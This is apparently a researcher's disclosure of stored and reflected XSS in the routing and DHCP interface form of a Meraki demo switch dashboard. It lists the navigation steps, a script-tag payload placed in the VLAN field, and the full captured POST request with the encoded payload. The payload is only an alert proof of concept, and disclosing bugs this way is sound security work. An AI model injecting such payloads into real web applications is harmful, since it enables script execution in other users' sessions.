I have found two XSS vulnerabilities in one simple process of creating a new switch interface.
Below are the details.
- Navigate to “Access Switches Tour” -> “Switch” -> “Configure” -> “Routing and DHCP”.
- Click the “Add an interface” button and fill “Name”, “Interface IP” and “DHCP server IPs” with whatever data. As the VLAN put the following payload: 1<script>alert(‘https://lubi.cz’)</script>
- Click the “Save” button. There will be the following POST request:
POST /Live-Demo-Switch/n/kaGejdmc/manage/nodes/update_switch_l2_dhcp_relays HTTP/1.1 Host: n140.meraki.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: kMHJ7LD3eYdG+QsNbr9yeJ2a+ZRiEy5g/oaYIu7Tq8k= X-Requested-With: XMLHttpRequest Referer: https://n140.meraki.com/Live-Demo-Switch/n/kaGejdmc/manage/configure/switchl3 Content-Length: 232 BAYEUX_BROWSER=bdf2orkeeghvrmlirmbfivj11iq Connection: close id=2207616097647&l2_dhcp_relays%5B0%5D%5Bname%5D=XSS&l2_dhcp_relays%5B0%5D%5Bip%5D=1.1.1.3&l2_dhcp_relays%5B0%5D%5Bvlan%5D=1%3Cscript%3Ealert('https%3A%2F%2Flubi.cz')%3C%2Fscript%3E&l2_dhcp_relays%5B0%5D%5Brelay_ips%5D%5B%5D=1.1.1.1
Then the JavaScript code will execute (reflected XSS). It is also a stored XSS, so it will fire up everytime the user navigates to https://n140.meraki.com/Live-Demo-Switch/n/kaGejdmc/manage/configure/switchl3